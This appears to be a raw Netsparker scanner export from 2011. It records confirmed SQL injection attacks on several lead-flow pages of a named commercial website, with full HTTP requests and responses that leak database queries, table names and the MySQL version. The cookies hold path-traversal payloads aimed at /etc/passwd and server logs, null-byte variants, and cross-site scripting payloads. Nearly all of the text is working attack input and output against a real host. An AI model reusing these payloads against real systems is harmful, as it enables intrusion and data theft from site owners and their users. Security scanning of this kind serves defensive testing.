OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=il1g31fhpk4io0k4bi5mh3sor7; path=/
Content-Length: 4878
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:1' for key 1
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ca56a19o1tpmn35n39hblthd63; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'Duplicate entry '_!@4dilemma:0' for key 1
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B(select+1+and+row(1%2c..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

Extracted Data

5.0.45

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 